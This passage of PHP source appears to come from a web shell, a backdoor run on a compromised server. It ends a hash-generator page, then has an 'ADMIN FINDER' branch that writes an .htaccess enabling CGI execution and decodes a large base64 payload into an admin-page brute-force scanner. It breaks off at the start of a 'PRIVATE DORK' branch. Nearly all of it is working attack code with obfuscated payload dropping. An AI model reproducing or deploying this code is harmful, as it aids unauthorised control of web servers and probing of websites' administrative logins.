echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
/////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
}elseif(isset($_GET['x']) && ($_GET['x'] == 'af')) {
echo "<center/><br/><b>
+--==[ ADMIN FINDER ]==--+
</b><br><br>";
mkdir('af', 0755);
chdir('af');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
$metin = "AddHandler cgi-script .izo";
fwrite ( $dosya , $metin ) ;
fclose ($dosya);
$pd = 'PD9waHANCnNldF90aW1lX2xpbWl0KDApOw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpc3RbJ2Zyb250J10gPSJhZG1pbg0KYWRtDQphZG1pbmNwDQphZG1jcA0KY3ANCm1vZGNwDQptb2RlcmF0b3JjcA0KYWRtaW5hcmUNCmFkbWlucw0KY3BhbmVsDQpjb250cm9scGFuZWwiOw0KJGxpc3RbJ2VuZCddID0gImFkbWluMS5waHANCmFkbWluMS5odG1sDQphZG1pbjIucGhwDQphZG1pbjIuaHRtbA0KeW9uZXRpbS5waHANCnlvbmV0aW0uaHRtbA0KeW9uZXRpY2kucGhwDQp5b25ldGljaS5odG1sDQpjY21zLw0KY2Ntcy9sb2dpbi5waHANCmNjbXMvaW5kZXgucGhwDQptYWludGVuYW5jZS8NCndlYm1hc3Rlci8NCmFkbS8NCmNvbmZpZ3VyYXRpb24vDQpjb25maWd1cmUvDQp3ZWJzdm4vDQphZG1pbi8NCmFkbWluL2FjY291bnQucGhwDQphZG1pbi9hY2NvdW50Lmh0bWwNCmFkbWluL2luZGV4LnBocA0KYWRtaW4vaW5kZXguaHRtbA0KYWRtaW4vbG9naW4ucGhwDQphZG1pbi9sb2dpbi5odG1sDQphZG1pbi9ob21lLnBocA0KYWRtaW4vY29udHJvbHBhbmVsLmh0bWwNCmFkbWluL2NvbnRyb2xwYW5lbC5waHANCmFkbWluLnBocA0KYWRtaW4uaHRtbA0KYWRtaW4vY3AucGhwDQphZG1pbi9jcC5odG1sDQpjcC5waHANCmNwLmh0bWwNCmFkbWluaXN0cmF0b3IvDQphZG1pbmlzdHJhdG9yL2luZGV4Lmh0bWwNCmFkbWluaXN0cmF0b3IvaW5kZXgucGhwDQphZG1pbmlzdHJhdG9yL2xvZ2luLmh0bWwNCmFkbWluaXN0cmF0b3IvbG9naW4ucGhwDQphZG1pbmlzdHJhdG9yL2FjY291bnQuaHRtbA0KYWRtaW5pc3RyYXRvci9hY2NvdW50LnBocA0KYWRtaW5pc3RyYXRvci5waHANCmFkbWluaXN0cmF0b3IuaHRtbA0KbG9naW4ucGhwDQpsb2dpbi5odG1sDQptb2RlbHNlYXJjaC9sb2dpbi5waHANCm1vZGVyYXRvci5waHANCm1vZGVyYXRvci5odG1sDQptb2RlcmF0b3IvbG9naW4ucGhwDQptb2RlcmF0b3IvbG9naW4uaHRtbA0KbW9kZXJhdG9yL2FkbWluLnBocA0KbW9kZXJhdG9yL2FkbWluLmh0bWwNCm1vZGVyYXRvci8NCmFjY291bnQucGhwDQphY2NvdW50Lmh0bWwNCmNvbnRyb2xwYW5lbC8NCmNvbnRyb2xwYW5lbC5waHANCmNvbnRyb2xwYW5lbC5odG1sDQphZG1pbmNvbnRyb2wucGhwDQphZG1pbmNvbnRyb2wuaHRtbA0KYWRtaW5wYW5lbC5waHANCmFkbWlucGFuZWwuaHRtbA0KYWRtaW4xLmFzcA0KYWRtaW4yLmFzcA0KeW9uZXRpbS5hc3ANCnlvbmV0aWNpLmFzcA0KYWRtaW4vYWNjb3VudC5hc3ANCmFkbWluL2luZGV4LmFzcA0KYWRtaW4vbG9naW4uYXNwDQphZG1pbi9ob21lLmFzcA0KYWRtaW4vY29udHJvbHBhbmVsLmFzcA0KYWRtaW4uYXNwDQphZG1pbi9jcC5hc3ANCmNwLmFzcA0KYWRtaW5pc3RyYXRvci9pbmRleC5hc3ANCmFkbWluaXN0cmF0b3IvbG9naW4uYXNwDQphZG1pbmlzdHJhdG9yL2FjY291bnQuYXNwDQphZG1pbmlzdHJhdG9yLmFzcA0KbG9naW4uYXNwDQptb2RlbHNlYXJjaC9sb2dpbi5hc3ANCm1vZGVyYXRvci5hc3ANCm1vZGVyYXRvci9sb2dpbi5hc3ANCm1vZGVyYXRvci9hZG1pbi5hc3ANCmFjY291bnQuYXNwDQpjb250cm9scGFuZWwuYXNwDQphZG1pbmNvbnRyb2wuYXNwDQphZG1pbnBhbmVsLmFzcA0KZmlsZWFkbWluLw0KZmlsZWFkbWluLnBocA0KZmlsZWFkbWluLmFzcA0KZmlsZWFkbWluLmh0bWwNCmFkbWluaXN0cmF0aW9uLw0KYWRtaW5pc3RyYXRpb24ucGhwDQphZG1pbmlzdHJhdGlvbi5odG1sDQpzeXNhZG1pbi5waHANCnN5c2FkbWluLmh0bWwNCnBocG15YWRtaW4vDQpteWFkbWluLw0Kc3lzYWRtaW4uYXNwDQpzeXNhZG1pbi8NCnVyLWFkbWluLmFzcA0KdXItYWRtaW4ucGhwDQp1ci1hZG1pbi5odG1sDQp1ci1hZG1pbi8NClNlcnZlci5waHANClNlcnZlci5odG1sDQpTZXJ2ZXIuYXNwDQpTZXJ2ZXIvDQp3cC1hZG1pbi8NCmFkbWluaXN0cjgucGhwDQphZG1pbmlzdHI4Lmh0bWwNCmFkbWluaXN0cjgvDQphZG1pbmlzdHI4LmFzcA0Kd2ViYWRtaW4vDQp3ZWJhZG1pbi5waHANCndlYmFkbWluLmFzcA0Kd2ViYWRtaW4uaHRtbA0KYWRtaW5pc3RyYXRpZS8NCmFkbWlucy8NCmFkbWlucy5waHANCmFkbWlucy5hc3ANCmFkbWlucy5odG1sDQphZG1pbmlzdHJpdmlhLw0KRGF0YWJhc2VfQWRtaW5pc3RyYXRpb24vDQpXZWJBZG1pbi8NCnVzZXJhZG1pbi8NCnN5c2FkbWlucy8NCmFkbWluMS8NCnN5c3RlbS1hZG1pbmlzdHJhdGlvbi8NCmFkbWluaXN0cmF0b3JzLw0KcGdhZG1pbi8NCmRpcmVjdGFkbWluLw0Kc3RhcmFkbWluLw0KU2VydmVyQWRtaW5pc3RyYXRvci8NClN5c0FkbWluLw0KYWRtaW5pc3Rlci8NCkxpdmVVc2VyX0FkbWluLw0Kc3lzLWFkbWluLw0KdHlwbzMvDQpwYW5lbC8NCmNwYW5lbC8NCmNQYW5lbC8NCmNwYW5lbF9maWxlLw0KcGxhdHpfbG9naW4vDQpyY0xvZ2luLw0KYmxvZ2luZGV4Lw0KZm9ybXNsb2dpbi8NCmF1dG9sb2dpbi8NCnN1cHBvcnRfbG9naW4vDQptZXRhX2xvZ2luLw0KbWFudWFsbG9naW4vDQpzaW1wbGVMb2dpbi8NCmxvZ2luZmxhdC8NCnV0aWxpdHlfbG9naW4vDQpzaG93bG9naW4vDQptZW1sb2dpbi8NCm1lbWJlcnMvDQpsb2dpbi1yZWRpcmVjdC8NCnN1Yi1sb2dpbi8NCndwLWxvZ2luLw0KbG9naW4xLw0KZGlyLWxvZ2luLw0KbG9naW5fZGIvDQp4bG9naW4vDQpzbWJsb2dpbi8NCmN1c3RvbWVyX2xvZ2luLw0KVXNlckxvZ2luLw0KbG9naW4tdXMvDQphY2N0X2xvZ2luLw0KYWRtaW5fYXJlYS8NCmJpZ2FkbWluLw0KcHJvamVjdC1hZG1pbnMvDQpwaHBwZ2FkbWluLw0KcHVyZWFkbWluLw0Kc3FsLWFkbWluLw0KcmFkbWluZC8NCm9wZW52cG5hZG1pbi8NCndpem15c3FsYWRtaW4vDQp2YWRtaW5kLw0KZXpzcWxpdGVhZG1pbi8NCmhwd2ViamV0YWRtaW4vDQpuZXdzYWRtaW4vDQphZG1pbnByby8NCkxvdHVzX0RvbWlub19BZG1pbi8NCmJiYWRtaW4vDQp2bWFpbGFkbWluLw0KSW5keV9hZG1pbi8NCmNjcDE0YWRtaW4vDQppcmMtbWFjYWRtaW4vDQpiYW5uZXJhZG1pbi8NCnNzaGFkbWluLw0KcGhwbGRhcGFkbWluLw0KbWFjYWRtaW4vDQphZG1pbmlzdHJhdG9yYWNjb3VudHMvDQphZG1pbjRfYWNjb3VudC8NCmFkbWluNF9jb2xvbi8NCnJhZG1pbmQtMS8NClN1cGVyLUFkbWluLw0KQWRtaW5Ub29scy8NCmNtc2FkbWluLw0KU3lzQWRtaW4yLw0KZ2xvYmVzX2FkbWluLw0KY2FkbWlucy8NCnBocFNRTGl0ZUFkbWluLw0KbmF2U2l0ZUFkbWluLw0Kc2VydmVyX2FkbWluX3NtYWxsLw0KbG9nb19zeXNhZG1pbi8NCnNlcnZlci8NCmRhdGFiYXNlX2FkbWluaXN0cmF0aW9uLw0KcG93ZXJfdXNlci8NCnN5c3RlbV9hZG1pbmlzdHJhdGlvbi8NCnNzX3Ztc19hZG1pbl9zbS8NCmFkbWluYXJlYS8NCmJiLWFkbWluLw0KYWRtaW5Mb2dpbi8NCnBhbmVsLWFkbWluaXN0cmFjaW9uLw0KaW5zdGFkbWluLw0KbWVtYmVyYWRtaW4vDQphZG1pbmlzdHJhdG9ybG9naW4vDQphZG1pbi9hZG1pbi5waHANCmFkbWluX2FyZWEvYWRtaW4ucGhwDQphZG1pbl9hcmVhL2xvZ2luLnBocA0Kc2l0ZWFkbWluL2xvZ2luLnBocA0Kc2l0ZWFkbWluL2luZGV4LnBocA0Kc2l0ZWFkbWluL2xvZ2luLmh0bWwNCmFkbWluL2FkbWluLmh0bWwNCmFkbWluX2FyZWEvaW5kZXgucGhwDQpiYi1hZG1pbi9pbmRleC5waHANCmJiLWFkbWluL2xvZ2luLnBocA0KYmItYWRtaW4vYWRtaW4ucGhwDQphZG1pbl9hcmVhL2xvZ2luLmh0bWwNCmFkbWluX2FyZWEvaW5kZXguaHRtbA0KYWRtaW5jcC9pbmRleC5hc3ANCmFkbWluY3AvbG9naW4uYXNwDQphZG1pbmNwL2luZGV4Lmh0bWwNCndlYmFkbWluL2luZGV4Lmh0bWwNCndlYmFkbWluL2FkbWluLmh0bWwNCndlYmFkbWluL2xvZ2luLmh0bWwNCmFkbWluL2FkbWluX2xvZ2luLmh0bWwNCmFkbWluX2xvZ2luLmh0bWwNCnBhbmVsLWFkbWluaXN0cmFjaW9uL2xvZ2luLmh0bWwNCm5zdy9hZG1pbi9sb2dpbi5waHANCndlYmFkbWluL2xvZ2luLnBocA0KYWRtaW4vYWRtaW5fbG9naW4ucGhwDQphZG1pbl9sb2dpbi5waHANCmFkbWluX2FyZWEvYWRtaW4uaHRtbA0KcGFnZXMvYWRtaW4vYWRtaW4tbG9naW4ucGhwDQphZG1pbi9hZG1pbi1sb2dpbi5waHANCmFkbWluLWxvZ2luLnBocA0KYmItYWRtaW4vaW5kZXguaHRtbA0KYmItYWRtaW4vbG9naW4uaHRtbA0KYmItYWRtaW4vYWRtaW4uaHRtbA0KYWRtaW4vaG9tZS5odG1sDQpwYWdlcy9hZG1pbi9hZG1pbi1sb2dpbi5odG1sDQphZG1pbi9hZG1pbi1sb2dpbi5odG1sDQphZG1pbi1sb2dpbi5odG1sDQphZG1pbi9hZG1pbkxvZ2luLmh0bWwNCmFkbWluTG9naW4uaHRtbA0KaG9tZS5odG1sDQpyY2pha2FyL2FkbWluL2xvZ2luLnBocA0KYWRtaW5hcmVhL2luZGV4Lmh0bWwNCmFkbWluYXJlYS9hZG1pbi5odG1sDQp3ZWJhZG1pbi9pbmRleC5waHANCndlYmFkbWluL2FkbWluLnBocA0KdXNlci5odG1sDQptb2RlbHNlYXJjaC9sb2dpbi5odG1sDQphZG1pbmFyZWEvbG9naW4uaHRtbA0KcGFuZWwtYWRtaW5pc3RyYWNpb24vaW5kZXguaHRtbA0KcGFuZWwtYWRtaW5pc3RyYWNpb24vYWRtaW4uaHRtbA0KbW9kZWxzZWFyY2gvaW5kZXguaHRtbA0KbW9kZWxzZWFyY2gvYWRtaW4uaHRtbA0KYWRtaW5jb250cm9sL2xvZ2luLmh0bWwNCmFkbS9pbmRleC5odG1sDQphZG0uaHRtbA0KdXNlci5waHANCnBhbmVsLWFkbWluaXN0cmFjaW9uL2xvZ2luLnBocA0Kd3AtbG9naW4ucGhwDQphZG1pbkxvZ2luLnBocA0KYWRtaW4vYWRtaW5Mb2dpbi5waHANCmhvbWUucGhwDQphZG1pbmFyZWEvaW5kZXgucGhwDQphZG1pbmFyZWEvYWRtaW4ucGhwDQphZG1pbmFyZWEvbG9naW4ucGhwDQpwYW5lbC1hZG1pbmlzdHJhY2lvbi9pbmRleC5waHANCnBhbmVsLWFkbWluaXN0cmFjaW9uL2FkbWluLnBocA0KbW9kZWxzZWFyY2gvaW5kZXgucGhwDQptb2RlbHNlYXJjaC9hZG1pbi5waHANCmFkbWluY29udHJvbC9sb2dpbi5waHANCmFkbS9hZG1sb2dpbnVzZXIucGhwDQphZG1sb2dpbnVzZXIucGhwDQphZG1pbjIvbG9naW4ucGhwDQphZG1pbjIvaW5kZXgucGhwDQphZG0vaW5kZXgucGhwDQphZG0ucGhwDQphZmZpbGlhdGUucGhwDQphZG1fYXV0aC5waHANCm1lbWJlcmFkbWluLnBocA0KYWRtaW5pc3RyYXRvcmxvZ2luLnBocA0KYWRtaW4vYWRtaW4uYXNwDQphZG1pbl9hcmVhL2FkbWluLmFzcA0KYWRtaW5fYXJlYS9sb2dpbi5hc3ANCmFkbWluX2FyZWEvaW5kZXguYXNwDQpiYi1hZG1pbi9pbmRleC5hc3ANCmJiLWFkbWluL2xvZ2luLmFzcA0KYmItYWRtaW4vYWRtaW4uYXNwDQpwYWdlcy9hZG1pbi9hZG1pbi1sb2dpbi5hc3ANCmFkbWluL2FkbWluLWxvZ2luLmFzcA0KYWRtaW4tbG9naW4uYXNwDQp1c2VyLmFzcA0Kd2ViYWRtaW4vaW5kZXguYXNwDQp3ZWJhZG1pbi9hZG1pbi5hc3ANCndlYmFkbWluL2xvZ2luLmFzcA0KYWRtaW4vYWRtaW5fbG9naW4uYXNwDQphZG1pbl9sb2dpbi5hc3ANCnBhbmVsLWFkbWluaXN0cmFjaW9uL2xvZ2luLmFzcA0KYWRtaW5Mb2dpbi5hc3ANCmFkbWluL2FkbWluTG9naW4uYXNwDQpob21lLmFzcA0KYWRtaW5hcmVhL2luZGV4LmFzcA0KYWRtaW5hcmVhL2FkbWluLmFzcA0KYWRtaW5hcmVhL2xvZ2luLmFzcA0KcGFuZWwtYWRtaW5pc3RyYWNpb24vaW5kZXguYXNwDQpwYW5lbC1hZG1pbmlzdHJhY2lvbi9hZG1pbi5hc3ANCm1vZGVsc2VhcmNoL2luZGV4LmFzcA0KbW9kZWxzZWFyY2gvYWRtaW4uYXNwDQphZG1pbmNvbnRyb2wvbG9naW4uYXNwDQphZG0vYWRtbG9naW51c2VyLmFzcA0KYWRtbG9naW51c2VyLmFzcA0KYWRtaW4yL2xvZ2luLmFzcA0KYWRtaW4yL2luZGV4LmFzcA0KYWRtL2luZGV4LmFzcA0KYWRtLmFzcA0KYWZmaWxpYXRlLmFzcA0KYWRtX2F1dGguYXNwDQptZW1iZXJhZG1pbi5hc3ANCmFkbWluaXN0cmF0b3Jsb2dpbi5hc3ANCnNpdGVhZG1pbi9sb2dpbi5hc3ANCnNpdGVhZG1pbi9pbmRleC5hc3ANCkFETUlOLw0KcGFuZWxkZWNvbnRyb2wvDQpsb2dpbi8NCmNtcy8NCmFkbW9uLw0KQURNT04vDQphZG1pbmlzdHJhZG9yLw0KQURNSU4vbG9naW4ucGhwDQpwYW5lbGMvDQpBRE1JTi9sb2dpbi5odG1sIjsNCmZ1bmN0aW9uIHRlbXBsYXRlKCkgew0KZWNobyAnDQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPkFkbWluIHBhZ2UgRmluZGVyIGJ5IGN5YmVyYmFnb3N0PC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5ew0KCWJhY2tncm91bmQ6ICMwMDA7DQoJbWFyZ2luOiAwOw0KCXBhZGRpbmc6IDA7DQoJcGFkZGluZy10b3A6IDEwcHg7DQoJY29sb3I6ICNGRkY7DQoJZm9udC1mYW1pbHk6IENhbGlicmk7DQoJZm9udC1zaXplOiAxM3B4Ow0KfQ0KYXsNCgljb2xvcjogI0ZGRjsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQoud3JhcHBlcnsNCgl3aWR0aDogMTAwMHB4Ow0KCW1hcmdpbjogMCBhdXRvOw0KfQ0KLnR1YmV7DQoJcGFkZGluZzogMTBweDsNCn0NCi5yZWR7DQoJd2lkdGg6IDk5OHB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICNlNTIyMjQ7DQoJYmFja2dyb3VuZDogIzE5MTkxOTsNCgljb2xvcjogI2U1MjIyNA0KfQ0KLnJlZCBpbnB1dHsNCgliYWNrZ3JvdW5kOiAjMDAwOw0KCWJvcmRlcjogMXB4IHNvbGlkICNlNTIyMjQ7DQoJY29sb3I6ICNGRkY7DQp9DQouYmx1ZXsNCglmbG9hdDogbGVmdDsNCgl3aWR0aDogMTAwMHB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICMxZDdmYzM7DQoJYmFja2dyb3VuZDogIzE5MTkxOTsNCgljb2xvcjogIzFkN2ZjMzsNCn0NCi5ncmVlbnsNCglmbG9hdDogbGVmdDsNCgl3aWR0aDogMTAwMHB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICM1ZmQ0MTk7DQoJYmFja2dyb3VuZDogIzE5MTkxOTsNCgljb2xvcjogIzVmZDQxOTsNCn0NCjwvc3R5bGU+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQo8IS0tDQpmdW5jdGlvbiBpbnNlcnRjb2RlKCR0ZXh0LCAkcGxhY2UsICRyZXBsYWNlKQ0Kew0KCXZhciAkdGhpcyA9ICR0ZXh0Ow0KCXZhciBsb2dib3ggPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgkcGxhY2UpOw0KCWlmKCRyZXBsYWNlID09IDApDQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCRwbGFjZSkuaW5uZXJIVE1MID0gbG9nYm94LmlubmVySFRNTCskdGhpczsNCgllbHNlDQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCRwbGFjZSkuaW5uZXJIVE1MID0gJHRoaXM7DQovL2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJoZWxwYm94IikuaW5uZXJIVE1MID0gJHRoaXM7DQp9DQotLT4NCjwvc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQo8YnIgLz4NCjxiciAvPg0KPGRpdiBjbGFzcz0id3JhcHBlciI+DQo8ZGl2IGNsYXNzPSJyZWQiPg0KPGRpdiBjbGFzcz0idHViZSI+DQo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBuYW1lPSJ4cGxvaXRfZm9ybSI+DQpVUkw6PGJyIC8+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InhwbG9pdF91cmwiIHZhbHVlPSInLiRfUE9TVFsneHBsb2l0X3VybCddLiciIHN0eWxlPSJ3aWR0aDogMTAwJTsiIC8+PGJyIC8+PGJyIC8+DQo0MDRzdHJpbmc6PGJyIC8+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InhwbG9pdF80MDRzdHJpbmciIHZhbHVlPSInLiRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddLiciIHN0eWxlPSJ3aWR0aDogMTAwJTsiIC8+PGJyIC8+PGJyIC8+DQo8c3BhbiBzdHlsZT0iZmxvYXQ6IHJpZ2h0OyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ieHBsb2l0X3N1Ym1pdCIgdmFsdWU9ImdvIGZvciBpdCIgYWxpZ249InJpZ2h0IiAvPjwvc3Bhbj4NCjwvZm9ybT4NCjxiciAvPg0KPC9kaXY+IDwhLS0gL3R1YmUgLS0+DQo8L2Rpdj4gPCEtLSAvcmVkIC0tPg0KPGJyIC8+DQo8ZGl2IGNsYXNzPSJncmVlbiI+DQo8ZGl2IGNsYXNzPSJ0dWJlIiBpZD0icmlnaHRjb2wiPg0KVmVyaWZpY2F0OiA8c3BhbiBpZD0idmVyaWZpZWQiPjA8L3NwYW4+IC8gPHNwYW4gaWQ9InRvdGFsIj4wPC9zcGFuPjxiciAvPg0KRm91bmQgb25lczo8YnIgLz4NCjwvZGl2PiA8IS0tIC90dWJlIC0tPg0KPC9kaXY+IDwhLS0gL2dyZWVuIC0tPg0KPGJyIGNsZWFyPSJhbGwiIC8+PGJyIC8+DQo8ZGl2IGNsYXNzPSJibHVlIj4NCjxkaXYgY2xhc3M9InR1YmUiIGlkPSJsb2dib3giPg0KPGJyIC8+DQo8YnIgLz4NCkFkbWluIHBhZ2UgRmluZGVyIDxiciAvPg0KYnkgY3liZXJiYWdob3N0PGJyIC8+DQo8L2Rpdj4gPCEtLSAvdHViZSAtLT4NCjwvZGl2PiA8IS0tIC9ibHVlIC0tPg0KPC9kaXY+IDwhLS0gL3dyYXBwZXIgLS0+DQo8YnIgY2xlYXI9ImFsbCI+JzsNCn0NCmZ1bmN0aW9uIHNob3coJG1zZywgJGJyPTEsICRzdG9wPTAsICRwbGFjZT0nbG9nYm94JywgJHJlcGxhY2U9MCkgew0KCWlmKCRiciA9PSAxKSAkbXNnIC49ICI8YnIgLz4iOw0KCWVjaG8gIjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPmluc2VydGNvZGUoJyIuJG1zZy4iJywgJyIuJHBsYWNlLiInLCAnIi4kcmVwbGFjZS4iJyk7PC9zY3JpcHQ+IjsNCglpZigkc3RvcCA9PSAxKSBleGl0Ow0KCUBmbHVzaCgpO0BvYl9mbHVzaCgpOw0KfQ0KZnVuY3Rpb24gY2hlY2soJHgsICRmcm9udD0wKSB7DQoJZ2xvYmFsICRfUE9TVCwkc2l0ZSwkZmFsc2U7DQoJaWYoJGZyb250ID09IDApICR0ID0gJHNpdGUuJHg7DQoJZWxzZSAkdCA9ICdodHRwOi8vJy4keC4nLicuJHNpdGUuJy8nOw0KCSRoZWFkZXJzID0gZ2V0X2hlYWRlcnMoJHQpOw0KCWlmICghZXJlZ2koJzIwMCcsICRoZWFkZXJzWzBdKSkgcmV0dXJuIDA7DQoJJGRhdGEgPSBAZmlsZV9nZXRfY29udGVudHMoJHQpOw0KCWlmKCRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddID09ICIiKSBpZigkZGF0YSA9PSAkZmFsc2UpIHJldHVybiAwOw0KCWlmKCRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddICE9ICIiKSBpZihzdHJwb3MoJGRhdGEsICRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddKSkgcmV0dXJuIDA7DQoJcmV0dXJuIDE7DQp9DQoJDQovLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KdGVtcGxhdGUoKTsNCmlmKCFpc3NldCgkX1BPU1RbJ3hwbG9pdF91cmwnXSkpIGRpZTsNCmlmKCRfUE9TVFsneHBsb2l0X3VybCddID09ICcnKSBkaWU7DQokc2l0ZSA9ICRfUE9TVFsneHBsb2l0X3VybCddOw0KaWYgKCRzaXRlW3N0cmxlbigkc2l0ZSktMV0gIT0gIi8iKSAkc2l0ZSAuPSAiLyI7DQppZigkX1BPU1RbJ3hwbG9pdF80MDRzdHJpbmcnXSA9PSAiIikgJGZhbHNlID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzaXRlLiJkNjU4OTdmNTM4MGEyMWE0MmRiOTRiMzkyN2I4MjNkNTZlZTEwOTlhLXRoaXNfY2FuLXRfZXhpc3QuaHRtbCIpOw0KJGxpc3RbJ2VuZCddID0gc3RyX3JlcGxhY2UoIlxyIiwgIiIsICRsaXN0WydlbmQnXSk7DQokbGlzdFsnZnJvbnQnXSA9IHN0cl9yZXBsYWNlKCJcciIsICIiLCAkbGlzdFsnZnJvbnQnXSk7DQokcGF0aGVzID0gZXhwbG9kZSgiXG4iLCAkbGlzdFsnZW5kJ10pOw0KJGZyb250cGF0aGVzID0gZXhwbG9kZSgiXG4iLCAkbGlzdFsnZnJvbnQnXSk7DQpzaG93KGNvdW50KCRwYXRoZXMpK2NvdW50KCRmcm9udHBhdGhlcyksIDEsIDAsICd0b3RhbCcsIDEpOw0KJHZlcmlmaWNhdGUgPSAwOw0KZm9yZWFjaCgkcGF0aGVzIGFzICRwYXRoKSB7DQoJc2hvdygnQ2hlY2tpbmcgJy4kc2l0ZS4kcGF0aC4nIDogJywgMCwgMCwgJ2xvZ2JveCcsIDApOw0KCSR2ZXJpZmljYXRlKys7IHNob3coJHZlcmlmaWNhdGUsIDAsIDAsICd2ZXJpZmllZCcsIDEpOw0KCWlmKGNoZWNrKCRwYXRoKSA9PSAwKSBzaG93KCdub3QgZm91bmQnLCAxLCAwLCAnbG9nYm94JywgMCk7DQoJZWxzZXsNCgkJc2hvdygnPHNwYW4gc3R5bGU9ImNvbG9yOiAjMDBGRjAwOyI+PHN0cm9uZz5mb3VuZDwvc3Ryb25nPjwvc3Bhbj4nLCAxLCAwLCAnbG9nYm94JywgMCk7DQoJCXNob3coJzxhIGhyZWY9IicuJHNpdGUuJHBhdGguJyI+Jy4kc2l0ZS4kcGF0aC4nPC9hPicsIDEsIDAsICdyaWdodGNvbCcsIDApOw0KCX0NCn0NCnByZWdfbWF0Y2goIi9cL1wvKC4qPylcLy9pIiwgJHNpdGUsICR4eCk7ICRzaXRlID0gJHh4WzFdOw0KaWYoc3Vic3RyKCRzaXRlLCAwLCAzKSA9PSAid3d3IikgJHNpdGUgPSBzdWJzdHIoJHNpdGUsIDQpOw0KZm9yZWFjaCgkZnJvbnRwYXRoZXMgYXMgJGZyb250cGF0aCkgew0KCXNob3coJ0NoZWNraW5nIGh0dHA6Ly8nLiRmcm9udHBhdGguJy4nLiRzaXRlLicvIDogJywgMCwgMCwgJ2xvZ2JveCcsIDApOw0KCSR2ZXJpZmljYXRlKys7IHNob3coJHZlcmlmaWNhdGUsIDAsIDAsICd2ZXJpZmllZCcsIDEpOw0KCWlmKGNoZWNrKCRmcm9udHBhdGgsIDEpID09IDApIHNob3coJ25vdCBmb3VuZCcsIDEsIDAsICdsb2dib3gnLCAwKTsNCgllbHNlew0KCQlzaG93KCc8c3BhbiBzdHlsZT0iY29sb3I6ICMwMEZGMDA7Ij48c3Ryb25nPmZvdW5kPC9zdHJvbmc+PC9zcGFuPicsIDEsIDAsICdsb2dib3gnLCAwKTsNCgkJc2hvdygnPGEgaHJlZj0iaHR0cDovLycuJGZyb250cGF0aC4nLicuJHNpdGUuJy8iPicuJGZyb250cGF0aC4nLicuJHNpdGUuJzwvYT4nLCAxLCAwLCAncmlnaHRjb2wnLCAwKTsNCgl9DQoJDQp9DQo/Pg==';
$file = fopen("af.php" ,"w+");
$write = fwrite ($file ,base64_decode($pd));
fclose($file);
chmod("af.php",0755);
echo " <iframe src=af/af.php width=96% height=76% frameborder=0></iframe>
</div>";
/////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
}elseif(isset($_GET['x']) && ($_GET['x'] == 'pd')) {
echo "<center/><br/><b>
+--==[ PRIVATE DORK ]==--+
</b><br><br>";
mkdir('pd', 0755);
chdir('pd');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
$metin = "AddHandler cgi-script .izo";
fwrite ( $dosya , $metin ) ;
fclose ($dosya);
